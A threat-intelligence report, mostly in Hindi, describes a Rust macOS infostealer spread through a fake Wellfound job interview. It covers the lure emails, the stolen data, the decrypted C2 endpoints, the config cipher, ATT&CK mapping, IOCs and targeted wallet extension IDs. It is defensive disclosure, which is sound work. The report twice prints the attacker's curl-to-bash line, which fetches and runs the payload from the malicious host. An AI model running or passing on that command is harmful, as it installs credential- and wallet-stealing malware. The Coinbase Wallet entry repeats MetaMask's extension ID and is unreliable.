HyperHives macOS Infostealer — पूर्ण तकनीकी विश्लेषण

खतरा बुद्धिमत्ता: Rust-आधारित macOS यूनिवर्सल बाइनरी इन्फोस्टीलर जो Wellfound (पूर्व में AngelList) पर नकली नौकरी साक्षात्कार पाइपलाइन के माध्यम से वितरित किया गया। "HyperHive" से ऑपरेटर व्यक्तित्व "Felix" ने लक्ष्यों को macos.hyperhives.net से एक दुर्भावनापूर्ण इंस्टॉलर चलाने के लिए लालच दिया। यह रिपॉजिटरी पूर्ण स्थैतिक विश्लेषण दस्तावेज़ित करती है: 571 एन्क्रिप्टेड कॉन्फ़िगरेशन मान पुनर्प्राप्त किए गए, जिनमें C2 URL, एक Sentry DSN, और 276 लक्षित Chrome एक्सटेंशन आईडी शामिल हैं।
| |
|---|
| नमूना SHA-256 | 5c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3 |
| C2 डोमेन | cloudproxy.link |
| वितरण डोमेन | macos.hyperhives.net |
| लालच मंच | Wellfound (पूर्व में AngelList) |
| ऑपरेटर व्यक्तित्व | "HyperHive" पर "Felix" |
| वायरसटोटल | 9 / 63 डिटेक्शन |
| वर्गीकरण | सार्वजनिक प्रकटीकरण / IOC बंडल |
| अंतिम अद्यतन | अप्रैल 2026 |
सामग्री
खतरा-बुद्धिमत्ता बंडल
रिपॉजिटरी लेआउट```
.
├── README.md # This report
├── iocs.txt # Flat IOC list
├── yara_rules.yar # YARA detection rules
├── sigma_rules.yml # Sigma detection rules
├── stix/
│ └── bundle.json # STIX 2.1 threat-intelligence bundle
├── attack-navigator-layer.json # ATT&CK Navigator layer
├── output/
│ ├── full_decrypted_config.json # Machine-readable decrypted configuration
│ ├── iocs.json # Structured IOC export
│ ├── c2_protocol.txt # C2 protocol field documentation
│ ├── cargo_dependencies.txt # Embedded Rust crate list (97 crates)
│ ├── source_map.txt # Reconstructed source-file layout
│ └── targets.txt # Targeted applications and data paths
├── scripts/
│ ├── decrypt_all.py # Definitive config decryptor (Unicorn emulation)
│ ├── analyze.py # Static analysis driver
│ ├── extract_all.py # String and structure extractor
│ ├── r2_analyze.py # Radare2 analysis automation
│ ├── r2_targeted.py # Targeted R2 analysis for helpers
│ └── validate_repo.py # CI validation script
├── sample/
│ └── README.md # Instructions for sample placement
├── Dockerfile # Analysis container image
├── docker-compose.yml # Air-gapped compose config
├── lab.sh # Helper script for Docker lab
├── SECURITY.md # Safe handling and vulnerability reporting
├── CONTRIBUTING.md # Contribution guidelines
├── CHANGELOG.md # Release history
├── LICENSE # MIT
└── .github/
├── workflows/validate.yml # CI: YARA + Sigma + file checks
├── ISSUE_TEMPLATE/ # Structured issue forms
└── PULL_REQUEST_TEMPLATE.md # PR checklist
---
## त्वरित आरंभ
नमूने को `sample/installer_binary` के रूप में रखें (हैश सत्यापन के लिए [`sample/README.md`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/sample/README.md) देखें), फिर:```bash
docker compose build
docker compose run --rm lab python3 /lab/scripts/decrypt_all.py
The compose file enforces network_mode: none, read_only: true, and drops all Linux capabilities. See SECURITY.md for full handling guidelines.
TL;DR
A job posting on Wellfound (formerly AngelList) led to a multi-email social-engineering chain from an operator persona "Felix" at "HyperHive". After flattering the target's technical background and scheduling a fake interview, the attacker directed the victim to "review the product" at hyperhives.net and specifically examine Settings → Diagnostics → Log — a pretext to trigger execution of:```
curl -s https://macos.hyperhives.net/install | nohup bash &
पेलोड एक **8.5 MB का Mach-O यूनिवर्सल बाइनरी** (x86_64 + arm64) है, जिसे Rust में संकलित किया गया है। एक एयर-गैप्ड Docker लैब और **570 अद्वितीय x86_64 हेल्पर रूटीन** के CPU एमुलेशन के साथ स्टैटिक विश्लेषण ने **सभी 571 एन्क्रिप्टेड कॉन्फ़िगरेशन मान** पुनर्प्राप्त किए, जिससे यह उजागर हुआ:
- **C2:** `cloudproxy.link` — चार HTTPS एंडपॉइंट
- **Sentry (एट्रिब्यूशन पिवट):** `ingest.de.sentry.io` पर org/project आईडी के साथ पूर्ण DSN
- **बिल्ड पहचान:** Cargo उपयोगकर्ता `rootr`, कोडनेम `force`, संस्करण `9.12.1`
- **लक्ष्य:** 276 Chrome एक्सटेंशन आईडी (क्रिप्टो वॉलेट, पासवर्ड मैनेजर, कॉर्पोरेट क्रेडेंशियल)
रणनीति **DPRK-लिंक्ड Contagious Interview** अभियानों के अनुरूप है — वैध प्लेटफ़ॉर्म पर नकली नौकरी भर्ती, मल्टी-स्टेप विश्वास निर्माण, `curl | bash` डिलीवरी, Rust macOS स्टीलर, और क्रिप्टो-केंद्रित एक्सफ़िल्ट्रेशन।
---
## 1 — यह कैसे शुरू हुआ
### लालच: Wellfound पर नकली नौकरी साक्षात्कार
हमला **Wellfound (पूर्व में AngelList) पर एक वैध दिखने वाली नौकरी पोस्टिंग** से शुरू हुआ। लक्ष्य द्वारा आवेदन करने के बाद, "Felix" नामक व्यक्तित्व और "HyperHive" कंपनी नाम का उपयोग करने वाले एक ऑपरेटर से निम्नलिखित ईमेल श्रृंखला शुरू हुई:
**ईमेल 1** (4 अप्रैल, 2026) — प्रारंभिक संपर्क। "Felix" ने लक्ष्य के CV और LinkedIn को स्वीकार किया, दावा किया कि उनके "Tech Lead" ने आगे बढ़ने की मंजूरी दे दी है, और विशेष रूप से लक्ष्य के वास्तविक तकनीकी अनुभव का उल्लेख किया। ईमेल में कहा गया कि HyperHive "विभिन्न ऑपरेटिंग सिस्टमों पर Hyperhives का डेस्कटॉप संस्करण बना रहा है" और लक्ष्य को UTC+0 में एक साक्षात्कार निर्धारित करने के लिए आमंत्रित किया।
**ईमेल 2** (5 अप्रैल, 2026) — फ़ॉलो-अप शेड्यूलिंग। एक विशिष्ट साक्षात्कार स्लॉट (8 अप्रैल को 15:00 UTC) प्रस्तावित किया और महत्वपूर्ण पेलोड डिलीवरी निर्देश शामिल किया:
> *"यदि आप कर सकते हैं, तो कृपया **सेटिंग्स → डायग्नोस्टिक्स → लॉग** के अंतर्गत उत्पाद लॉग पर भी एक त्वरित नज़र डालें। हम लॉग और आपके द्वारा देखी गई किसी भी अन्य उत्पाद टिप्पणियों पर कुछ संक्षिप्त टिप्पणियाँ माँग सकते हैं, क्योंकि यह अक्सर इंजीनियरिंग अनुभव और विस्तार पर ध्यान देने का एक अच्छा संकेत देता है।"*
इसने लक्ष्य को `https://hyperhives.net` पर निर्देशित किया, जहाँ डायग्नोस्टिक्स अनुभाग पर नेविगेट करने से ट्रिगर हुआ:```
curl -s https://macos.hyperhives.net/install | nohup bash &
आगे क्या हुआ
कमांड ने 8.5 MB का Mach-O यूनिवर्सल बाइनरी डाउनलोड और निष्पादित किया। AppleScript के माध्यम से एक नकली macOS पासवर्ड डायलॉग दिखाई दिया। पासवर्ड दर्ज नहीं किया गया। प्रक्रियाओं को तुरंत समाप्त कर दिया गया और नमूने को विश्लेषण के लिए संरक्षित किया गया।
सोशल-इंजीनियरिंग ट्रेडक्राफ्ट सारांश
2 — बाइनरी
नमूना उत्पादन-ग्रेड इंजीनियरिंग प्रदर्शित करता है: सिमैंटिक वर्जनिंग, परिचालन विश्वसनीयता के लिए Sentry एकीकरण, और 570 अद्वितीय हेल्पर फ़ंक्शंस के साथ एन्क्रिप्टेड एक बड़ा एम्बेडेड कॉन्फ़िगरेशन।
VirusTotal कवरेज
पूर्ण रिपोर्ट — प्रारंभिक सबमिशन (अप्रैल 2026) के अनुसार 9/63 इंजनों ने पता लगाया। 85% से अधिक इंजन इस नमूने को फ़्लैग करने में विफल रहे।
क्रॉस-रेफरेंसिंग के लिए उल्लेखनीय विक्रेता परिवार के नाम: HashBreaker (Kaspersky), JobStealer (DrWeb), PSW.Agent.BX (ESET), Stealer-BU (Avast/AVG)।
इनके द्वारा पता नहीं लगाया गया: BitDefender, CrowdStrike Falcon, Sophos, Symantec, McAfee, Malwarebytes, TrendMicro, Fortinet, ClamAV, Panda, और 44 अन्य इंजन। यह कम पहचान दर इस अभियान द्वारा उपयोग किए गए Rust + कस्टम अस्पष्टीकरण दृष्टिकोण की परिचालन प्रभावशीलता को रेखांकित करती है।
विक्रेता हस्ताक्षर अपडेट करने पर पहचान अनुपात बदल जाते हैं। वर्तमान परिणामों के लिए VirusTotal रिपोर्ट देखें।
3 — यह क्या चुराता है
ब्राउज़र डेटा (क्रोमियम-आधारित)
चुराए गए डेटा प्रकार: पासवर्ड, क्रेडिट कार्ड, कुकीज़, सत्र टोकन, ऑटोफिल, ब्राउज़िंग इतिहास।
macOS सिस्टम डेटा
- लॉगिन कीचेन (
login.keychain-db) — नकली डायलॉग के माध्यम से काटा गया उपयोगकर्ता पासवर्ड आवश्यक है
- Apple Notes — AppleScript/osascript के माध्यम से बाहर निकाला गया
- हार्डवेयर पहचानकर्ता —
IOPlatformExpertDevice / IOPlatformUUID, C2 को hardwares के रूप में रिपोर्ट किया गया
मैसेजिंग
- Telegram Desktop — पूर्ण खाता अधिग्रहण के लिए
tdata सत्र सामग्री
क्रिप्टो वॉलेट (188 तार्किक लक्ष्य, 276 एक्सटेंशन आईडी)
MetaMask, Phantom, Trust Wallet, Ronin, Exodus, OKX, Bybit, Bitget, SubWallet, Ledger Live और Trezor Suite सहित ब्राउज़र-एक्सटेंशन वॉलेट का व्यापक लक्ष्यीकरण। पूर्ण मैपिंग सेक्शन 8 और output/full_decrypted_config.json में।
पासवर्ड मैनेजर
चोरी और परिचालन नियंत्रण
| सुविधा | विवरण |
|---|
| वीएम पहचान | C2 JSON में फ़्लैग |
डेटा बहिर्गमन
डेटा ~/Documents/temp_data/Application/ के तहत संग्रहीत किया जाता है, ZIP में संपीड़ित किया जाता है, HTTPS पर multipart/form-data के माध्यम से अपलोड किया जाता है। पीड़ित का IP और भौगोलिक स्थान https://freeipapi.com/api/json के माध्यम से हल किया जाता है।
4 — डिक्रिप्टेड C2 बुनियादी ढाँचा
कमांड और नियंत्रण
| एंडपॉइंट | भूमिका |
|---|
https://cloudproxy.link/m/opened | बीकन / सक्रियण |
https://cloudproxy.link/m/metrics |
Sentry DSN (ऑपरेटर फ़िंगरप्रिंट)```
https://526eff9f8bb7aafd7117ca5e33a6a183@o4509139651198976.ingest.de.sentry.io/4509422649213008
| घटक | मान |
|-----------|-------|
| **सार्वजनिक कुंजी** | `526eff9f8bb7aafd7117ca5e33a6a183` |
| **संगठन आईडी** | `4509139651198976` |
| **प्रोजेक्ट आईडी** | `4509422649213008` |
| **क्षेत्र** | EU — `ingest.de.sentry.io` |
Sentry के साथ कानूनी प्रक्रिया से इस org/project से जुड़े खाता पंजीकरण विवरण, बिलिंग रिकॉर्ड और एक्सेस मेटाडेटा प्राप्त हो सकते हैं।
### भू-स्थान API
`https://freeipapi.com/api/json` — C2 JSON के लिए पीड़ित का आईपी / देश (`ipAddress`, `countryCode`)।
### C2 एक्सफिल्ट्रेशन प्रोटोकॉल
| फ़ील्ड | भूमिका |
|-------|------|
| `buildName` / `buildVersion` | `force` / `9.12.1` |
| `uid`, `log_id` | पीड़ित / सत्र पहचानकर्ता |
| `ip`, `geo` | भू-स्थान API से |
| `pers_password` | नकली-संवाद पासवर्ड |
| `passwords`, `wallets`, `credits`, `autofills` | चुराई गई सामग्री |
| `is_vm`, `hardwares`, `force_mode` | पर्यावरण / नियंत्रण फ़्लैग |
अपलोड विधि: `multipart/form-data`, `application/zip`, कनेक्शन स्ट्रिंग `UPLD connect`।
---
## 5 — आरोपण
### समझौता संकेतक
| संकेतक | मान | स्रोत |
|-----------|-------|--------|
| लालच मंच | Wellfound (AngelList) | पीड़ित रिपोर्ट |
| संचालक व्यक्तित्व | "Felix" at "HyperHive" | लालच ईमेल |
| लालच वेबसाइट | `hyperhives.net` | लालच ईमेल |
| प्रेषक ईमेल | `[email protected]` | लालच ईमेल |
| वितरण डोमेन | `macos.hyperhives.net` | पेलोड डाउनलोड |
| वितरण आईपी | `81.28.12.12` (Gcore CDN) | DNS रिज़ॉल्यूशन |
| रजिस्ट्रार / ईमेल | Tucows; Spacemail | WHOIS / MX |
| **C2 डोमेन** | **`cloudproxy.link`** | **नमूने से डिक्रिप्ट किया गया** |
| **Sentry DSN** | [धारा 4](#sentry-dsn-operator-fingerprint) देखें | **नमूने से डिक्रिप्ट किया गया** |
| बिल्ड उपयोगकर्ता | `rootr` | एम्बेडेड Cargo पथ |
| नमूना SHA-256 | `5c7385c3...bf8dd3` | फ़ाइल हैश |
### डेवलपर हैंडल: `rootr`
एम्बेडेड पथ `/Users/rootr/.cargo/registry/`। हैंडल पर OSINT — [github.com/rootr](https://github.com/rootr) (विश्लेषण तिथि के अनुसार): सूचीबद्ध कंपनी "RootR", स्थान जिनेवा, खाता निर्मित **2024-06-27**, शून्य सार्वजनिक रिपॉजिटरी। एक डिस्पोजेबल या परिचालन प्रोफ़ाइल के अनुरूप।
### DPRK / Contagious Interview (विश्लेषणात्मक मूल्यांकन)
| TTP | यह नमूना | रिपोर्ट किया गया DPRK-संबंधित पैटर्न |
|-----|-------------|--------------------------------|
| **वैध मंच पर नकली नौकरी भर्ती** | Wellfound (AngelList) पोस्टिंग → "Felix" के साथ ईमेल श्रृंखला | Contagious Interview: LinkedIn, Indeed, Wellfound नकली भर्ती संपर्क |
| **बहु-चरणीय सोशल इंजीनियरिंग** | वास्तविक CV का संदर्भ देते हुए 2+ ईमेल, नकली साक्षात्कार शेड्यूल करना | पेलोड से पहले विश्वास बनाएं; कई DPRK अभियानों में दस्तावेज़ीकृत |
| **उत्पाद समीक्षा / कोड परीक्षण बहाना** | "Settings → Diagnostics → Log चेक करें" | "हमारा प्रोजेक्ट समीक्षा करें" / "यह कोड परीक्षण चलाएं" बहाने |
| `curl \| bash` वितरण | `macos.hyperhives.net` से इंस्टॉल वन-लाइनर | सामान्य macOS सोशल-इंजीनियरिंग वेक्टर |
| Rust Mach-O यूनिवर्सल बाइनरी | rustc 1.87.0, x86_64 + arm64 | RustDoor / RustBucket / समान क्लस्टर |
| नकली पासवर्ड संवाद | AppleScript `osascript` | संबंधित macOS अभियानों में दस्तावेज़ीकृत |
| बड़ा क्रिप्टो वॉलेट लक्ष्य सेट | 276 एक्सटेंशन आईडी, 188 वॉलेट नाम | DPRK राजस्व सृजन के अनुरूप वित्तीय प्रेरणा |
**विश्वास स्तर:** विषयगत और TTP संरेखण के लिए **उच्च**। Wellfound नकली-नौकरी पाइपलाइन, बहु-ईमेल विश्वास श्रृंखला, उत्पाद-समीक्षा बहाना, Rust macOS स्टीलर, और क्रिप्टो-वॉलेट फोकस Contagious Interview प्लेबुक से निकटता से मेल खाते हैं। यह एक विश्लेषणात्मक मूल्यांकन है, न कि सरकारी या कानून-प्रवर्तन आरोपण कथन।
---
## 6 — क्रिप्टैनालिसिस
कॉन्फ़िगरेशन स्ट्रिंग्स एक **कस्टम XOR सिफर** द्वारा संरक्षित हैं: 570 छोटे x86_64 हेल्पर फ़ंक्शन (कोड रेंज `0x10000`–`0x15000`) प्रत्येक `(data_ptr, seed)` से एक अद्वितीय 16-बिट ऑफ़सेट की गणना करते हैं। ऑफ़सेट बाइनरी में इंडेक्स करके 32-बाइट XOR कुंजी उत्पन्न करता है जो संबंधित सिफरटेक्स्ट ब्लॉक पर लागू होती है।
### विफल रहे दृष्टिकोण
| विधि | परिणाम |
|--------|---------|
| नाइव XOR स्वीप | कोई सुसंगत प्लेनटेक्स्ट नहीं |
| AES / PBKDF2 कुंजी अनुमान | कोई कुंजी शेड्यूल नहीं मिला |
| Rust रनटाइम का पूर्ण-बाइनरी यूनिकॉर्न एमुलेशन | नियंत्रण-प्रवाह जटिलता के कारण विचलन |
### सफल दृष्टिकोण
1. **स्कैन** करें RIP-रिलेटिव `LEA` निर्देशों के लिए जो कॉन्फ़िग रीजन (`0x2b8000`–`0x2bc000`) को लक्षित करते हैं।
2. **पार्स** करें पूर्ववर्ती कोड से `(helper_function_address, data_pointer, seed)` निकालने के लिए।
3. **एमुलेट** करें प्रत्येक हेल्पर को अलग-थलग करके [Unicorn Engine](https://www.unicorn-engine.org/) का उपयोग करते हुए (अधिकतम 200 निर्देश)।
4. **XOR-डिक्रिप्ट** करें लक्षित पते पर 32-बाइट ब्लॉक को, गणना किए गए ऑफ़सेट पर कुंजी का उपयोग करके।
5. **विस्तारित** करें मल्टी-ब्लॉक स्ट्रिंग्स (URL, DSN) और OR+XOR मेटाडेटा एंट्री के लिए।
**कवरेज:** 381 XOR ब्लॉक + 190 OR+XOR मेटाडेटा एंट्री = **571 कॉन्फ़िगरेशन मान** 1.1 सेकंड में पुनर्प्राप्त। शून्य अपुनर्प्राप्त एन्क्रिप्टेड एंट्री।
**कार्यान्वयन:** [`scripts/decrypt_all.py`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/scripts/decrypt_all.py)
---
## 7 — MITRE ATT&CK मैपिंग
> [`attack-navigator-layer.json`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/attack-navigator-layer.json) को [ATT&CK Navigator](https://mitre-attack.github.io/attack-navigator/) में इंटरैक्टिव दृश्य के लिए आयात करें।
| तकनीक | आईडी | इस नमूने में उपयोग |
|-----------|----|--------------------|
| फ़िशिंग | T1566 | `[email protected]` से सोशल-इंजीनियरिंग ईमेल |
| उपयोगकर्ता निष्पादन: दुर्भावनापूर्ण फ़ाइल | T1204.002 | लालच से `curl \| bash` |
| कमांड और स्क्रिप्टिंग इंटरप्रेटर: AppleScript | T1059.002 | नकली पासवर्ड संवाद, Apple Notes एक्सफिल्ट्रेशन |
| कमांड और स्क्रिप्टिंग इंटरप्रेटर: Unix शेल | T1059.004 | पाइप्ड bash के माध्यम से प्रारंभिक निष्पादन |
| पासवर्ड स्टोर से क्रेडेंशियल्स: कीचेन | T1555.001 | लॉगिन कीचेन निष्कर्षण |
| पासवर्ड स्टोर से क्रेडेंशियल्स: वेब ब्राउज़र से क्रेडेंशियल्स | T1555.003 | Chromium लॉगिन डेटा डिक्रिप्शन |
| वेब सत्र कुकी चुराएं | T1539 | ब्राउज़र कुकी और टोकन चोरी |
| स्थानीय सिस्टम से डेटा | T1005 | वॉलेट, Telegram, नोट्स, ऑटोफिल |
| संग्रहित किया गया डेटा | T1560 | `~/Documents/temp_data/` के अंतर्गत ZIP स्टेजिंग |
| C2 चैनल पर एक्सफिल्ट्रेशन | T1041 | `cloudproxy.link` पर HTTPS POST |
| एप्लिकेशन लेयर प्रोटोकॉल: वेब प्रोटोकॉल | T1071.001 | चार एंडपॉइंट के साथ HTTPS C2 |
| वर्चुअलाइजेशन/सैंडबॉक्स एवेज़न | T1497 | `is_vm` फ़्लैग |
| अस्पष्टीकृत फ़ाइलें या जानकारी | T1027 | 570 XOR हेल्पर फ़ंक्शन |
| इनपुट कैप्चर | T1056 | नकली पासवर्ड संवाद |
| सिस्टम सूचना खोज | T1082 | हार्डवेयर आईडी और OS संस्करण संग्रह |
| सिस्टम नेटवर्क कॉन्फ़िगरेशन खोज | T1016 | `freeipapi.com` भू-स्थान |
| ट्रस्ट नियंत्रणों को कमजोर करें: गेटकीपर बाईपास | T1553.001 | डाउनलोड की गई बाइनरी पर `xattr -c` |
---
## 8 — वॉलेट और एक्सटेंशन-आईडी संदर्भ
188 वॉलेट नाम और **276 अद्वितीय** 32-वर्ण Chrome एक्सटेंशन आईडी पुनर्प्राप्त किए गए। निम्न तालिका उच्च-प्रोफ़ाइल लक्ष्य दिखाती है; पूरी सूची [परिशिष्ट A](#appendix-a--all-276-chrome-extension-ids) और `output/full_decrypted_config.json` में है।
| वॉलेट | एक्सटेंशन आईडी |
|--------|--------------|
| MetaMask | `hnfanknocfeofbddgcijnmhnfnkdnaad` |
| Phantom | `bfnaelmomeimhlpmgjnjophhpkkoljpa` |
| Trust Wallet | `egjidjbpglichdcondbcbdnbeeppgdph` |
| Ronin | `fnjhmkhhmkbjkkabndcnnogagogbneec` |
| Exodus Web3 | `aholpfdialjgjfhomihkjbmgjidlcdno` |
| OKX | `mcohilncbfahbmgdjkbpemcciiolgcge` |
| Bybit | `pdliaogehgdbhbnmkklieghmmjkpigpa` |
| Bitget | `jiidiaalihmmhddjgbnbgdfflelocpak` |
| SubWallet | `onhogfjeacnfoofkfgppdlbmlmnplgbn` |
| Coinbase Wallet | `hnfanknocfeofbddgcijnmhnfnkdnaad` |
**डेस्कटॉप वॉलेट:** Ledger Live और Trezor Suite डेटा निर्देशिकाएं भी लक्षित हैं।
**महत्वपूर्ण:** ये एक्सटेंशन आईडी **वैध ब्राउज़र एक्सटेंशन** की पहचान करती हैं जिनके स्थानीय डेटा को मैलवेयर चोरी के लिए लक्षित करता है। ये **दुर्भावनापूर्ण एक्सटेंशन नहीं** हैं।
---
## 9 — अनुशंसित कार्रवाइयाँ
### संभावित पीड़ितों के लिए
- अज्ञात `curl | bash` वन-लाइनर्स **न चलाएं**
- यदि उजागर हुए हैं तो सभी ब्राउज़र-संग्रहीत क्रेडेंशियल्स, क्रिप्टो वॉलेट कुंजियाँ, और पासवर्ड-मैनेजर मास्टर पासवर्ड बदलें
- डिस्क पर `~/Documents/temp_data/` की जाँच करें
- स्थानीय कानून प्रवर्तन और प्रासंगिक राष्ट्रीय CERT (जैसे, IC3, NCSC) को रिपोर्ट करें
### रक्षकों के लिए
- `macos.hyperhives.net`, `cloudproxy.link`, और `81.28.12.12` को **ब्लॉक** करें (IP ब्लॉक करने से पहले साझा-होस्टिंग प्रभाव सत्यापित करें)
- `cloudproxy.link` पर HTTPS ट्रैफ़िक और दोनों डोमेन के लिए DNS क्वेरी की **खोज** करें
- इस रिपॉजिटरी से YARA और Sigma नियमों को **तैनात** करें (अपने वातावरण के अनुसार समायोजित करें)
- स्थापित Chrome एक्सटेंशन की तुलना 276-आईडी सूची से करें (एक्सटेंशन वैध हैं — मैलवेयर उनका स्थानीय डेटा पढ़ता है)
- `stix/bundle.json` को अपने CTI प्लेटफ़ॉर्म (MISP, OpenCTI, ThreatConnect, आदि) में **आयात** करें
### कानूनी खोज के लिए
| लक्ष्य | क्या अनुरोध करें |
|--------|-----------------|
| Sentry | org `4509139651198976` के लिए खाता और बिलिंग रिकॉर्ड |
| डोमेन रजिस्ट्रार | `cloudproxy.link` और `hyperhives.net` के लिए WHOIS रिकॉर्ड |
| Gcore CDN | `81.28.12.12` के लिए एक्सेस लॉग |
| ईमेल प्रदाता | `[email protected]` के लिए खाता रिकॉर्ड |
| GitHub | `rootr` के लिए खाता मेटाडेटा |
---
## 10 — कार्यप्रणाली
विश्लेषण एक **Docker कंटेनर** में किया गया:
- `network_mode: none` (कोई आउटबाउंड कनेक्टिविटी नहीं)
- `read_only: true` (अपरिवर्तनीय रूट फ़ाइलसिस्टम)
- सभी Linux क्षमताएं हटाई गईं (`cap_drop: ALL`)
- `no-new-privileges` सुरक्षा विकल्प
उपकरण: Python (LIEF, Unicorn Engine, Capstone, r2pipe), Radare2, और कस्टम स्क्रिप्ट। मैलवेयर का कोई गतिशील निष्पादन नहीं किया गया — सभी निष्कर्ष स्थैतिक विश्लेषण और व्यक्तिगत हेल्पर फ़ंक्शन के पृथक CPU एमुलेशन से प्राप्त हुए।
सत्यापित कलाकृतियाँ: [`scripts/decrypt_all.py`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/scripts/decrypt_all.py), [`output/full_decrypted_config.json`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/output/full_decrypted_config.json)।
---
## परिशिष्ट A — सभी 276 Chrome एक्सटेंशन आईडी
मैलवेयर कॉन्फ़िगरेशन इन एक्सटेंशन आईडी को संदर्भित करता है (उपयोगकर्ता प्रोफ़ाइलों के अंतर्गत local-storage / LevelDB पथ)। **ये आईडी डेटा चोरी के लिए लक्षित वैध एक्सटेंशन की पहचान करती हैं, दुर्भावनापूर्ण एक्सटेंशन नहीं।**```
abkahkcbhngaebpcgfmhkoioedceoigp abogmiocnneedmmepnohnhlijcjpcifd
acmacodkjbdgmoleebolmdjonilkdbch aeachknmefphepccionboohckonoeemg
aeblfdkhhhdcdjpifhhbdiojplfjncoa afbcbjpbpfadlkmhmclhkeeodmamcflc
afccgfbnbpgfdokbllhiccepgggofoco aflkmfhebedbjioipglgcbcmnbpgliof
agoakfejjabomempkjlepdflaleeobhb ahkpfejaeoepmfopmbhjgjekibmfcfgo
aholpfdialjgjfhomihkjbmgjidlcdno aiifbnbfobpmeekipheeijimdpnlpgpp
aijcbedoijmgnlmjeegjaglmepbmpkpi ajofhbfomojicfifgoeeimefklkfdkfn
ajopcimklncnhjednieoejhkffdolemp akckefnapafjbpphkefbpkpcamkoaoai
akkmagafhjjjjclaejjomkeccmjhdkpa algblmhagnobbnmakepomicmfljlbehg
amdcajcnofodjpgbbdnnjkffamfnidae amkmjjmmflddogmhpjloimipbofnfjih
ammjlinfekkoockogfhdkgcohjlbhmff anokgmphncpekkhclmingpimjmcooifb
aodkkagnadcbobfpggfnjeongemjbjca aoedbjimepepemdafoodplnknfkmbnle
apgjfbcibghlclbdiipmojppngeilcol bbjmepflljbbfaehppakknfgdnojoled
bccippoanbhflmokhkbkepmhmndijenh bcpialkijhffpgnmgjhjmdeabdbbfmbo
bdgmdoedahdcjmpmifafdhnffjinddgc bfeplaecgkoeckiidkgkmlllfbaeplgm
bflldjbbpcjgooclhpmhdhioebmnnkcm bfnaelmomeimhlpmgjnjophhpkkoljpa
bgjogpoidejdemgoochpnkmdjpocgkha bhhhlbepdkbapadjdnnojkbgioiodbic
bhmbcdekobebkhmloafbjfdcphbmpcnm bidcmgjdfgkagkleecdockomdjlgglbg
bifidjkcdpgfnlbcjpdkdcnbiooooblg blnieiiffboillknjnepogjhkgnoapac
bmkakpenjmcpfhhjadflneinmhboecjf bmmhjnaohafphhlecmkkiaaglcebcapn
bodadjcgfgigmmnambomndppidgdjlni bplepbelihejfpcjoeialhjpamgpnfln
caalbmclnkldkcgcdkfiapoopikbofnl cgeeodpfagjceefieflmdfphplkenlfk
cihmoadaighcejopammfbmddcmdekcje ciojocpkclfflombbcfigcijjcbkmhaf
cjelfplplebdjjenllpjcblmjkfcffne ckklhkaabbmdjkahiaaplikpdddkenic
cmbagcoinhmacpcgmbiniijboejgiahi cmoakldedjfnjofgbbfenefcagmedlga
cnmbailpgmdagpofalkeoeooefdkjfdl cnncmdhjacpkmjmkcafchppbnpnhdmon
cnoepnljjcacmnjnopbhjelpmfokpijm codfcglpplgmmlokgilfkpcjnmkbfiel
cpmkedoipcpimgecpmgpldfpohjplkpp dbgnhckhnppddckangcjbkjnlddbjkna
dcbjpgbkjoomeenajdabiicabjljlnfp dfbacijefbcabjnngipfnbhcpoldlkcg
dkdedlpgdmmkkfjabffeganieamfklkm dlcobpjiigpikoobohmabehhmhfoodbb
dldjpboieedgcmpkchcjcbijingjcgok dmjmllblpcbmniokccdoaiahcdajdjof
dngmlblcodfobpdpecaadgfbcggfjfnm dpcklmdombjcplafheapiblogdlgjjlb
dpdmipjakdiapplcecdmgckknipnfjph dpealdfjgahljjdekeiadjnfgpijffhg
dpmfhilhjlhhakpbieclcghochdofeao eaeecbmeajhliilmacefcgjnnijkkfki
ebaeifdbcjklcmoigppnpkcghndhpbbm ebfidpplhabeedpnhjnobghokpiioolj
efbglgofoippbgcjepnhiblaibcnclgk egjidjbpglichdcondbcbdnbeeppgdph
ehgjhhccekdedpbkifaojjaefeohnoea ehjiblpccbknkgimiflboggcffmpphhp
ejbalbakoplchlghecdalmeeeajnimhm ejbidfepgijlcgahbmbckmnaljagjoll
ejdmhlhkcfbkcoifejkcbonhodkgflgg ejjladinnckdgjemekebdpeokbikhfci
elalghlhoepcjfaedkcmjolahamlnjcp eljobehkpcnpekmbcjiidekjhkbcnpkf
ellkdbaphhldpeajbepobaecooaoafpg emafjfadeeammocialbgjbaeldmpddne
emeeapjkbcbpbpgaagfchmcgglmebnen emgcpdnckldpdhjgmkeeahfaokmhgpab
enabgbdfcbaehmbigakijjabdpdnimlg epapihdplajcdnnkdeiahlgigofloibg
fajmdbbmcncahahilpfdiacamedmgdlk fbplgegfggencanbeceipjpanlmgpkfi
fcckkdbjnoikooededlapcalpionmalo fcfcfllfndlomdhbehjjcoimbgofdncg
fcjkomdnccnlklmhncgmaehaakjkddnk fdchdcpieegfofnofhgdombfckhbcokj
fdcnegogpncmfejlfnffnofpngdiejii fdjamakpfbbddfjaooikfcpapjohcfmg
fhbohimaelbohpjbbldcngcnapndodjp fhilaheimglignddkjgofkcbgekhenbh
fhmmkjofdcpnoklcbcnbjjhigobceikb fihkakfobkmkjojpchpfgcmhfjnmnfpi
fijngjgcjhjmmpcmkeiomlglpeiijkld fjghjobbfggoacelnibacipoilennobn
fldfpgipfncgndfolcbkdeeknbbbnhcc fmpbldieijjehhalgjblbpgjmijencll
fnabdmcgpkkjjegokfcnfbpneacddpfh fnjhmkhhmkbjkkabndcnnogagogbneec
fnnegphlobjdpkhecapkijjdkgcjhkib fopmedgnkfpebgllppeddmmochcookhc
fpibioaihcagphbidhodidjbnclocgll fpkhgmpbidmiogeglndfbkegfdlnajnf
gbjepgaebckfidagpfeioimheabiohmg gdokollfhmnbfckbobkdbakhilldkhcj
gejiddohjgogedgjnonbofjigllpkmbf ghihpcdpbjaaomhlfnhdlocimojkinpm
ghlmndacnhlaekppcllcpcjjjomjkjpg ghmbeldphafepmbegfdlkpapadhbakde
gjlmehlldlphhljhpnlddaodbjjcchai gkeelndblnomfmjnophbhfhcjbcnemka
gkhnjcpkikkkfhhdhhphcbhmkikoicgn gkpbmnplcjdnnmmiaaphofhdiicdhfah
glhefpglgefbmegkpjkdgoikologepdl hbbgbephgojikajhfbomhlmmollphcad
hbdheoebpgogdkagfojahleegjfkhkpl hbinmkhlebcnghpikoekkbeljbealbje
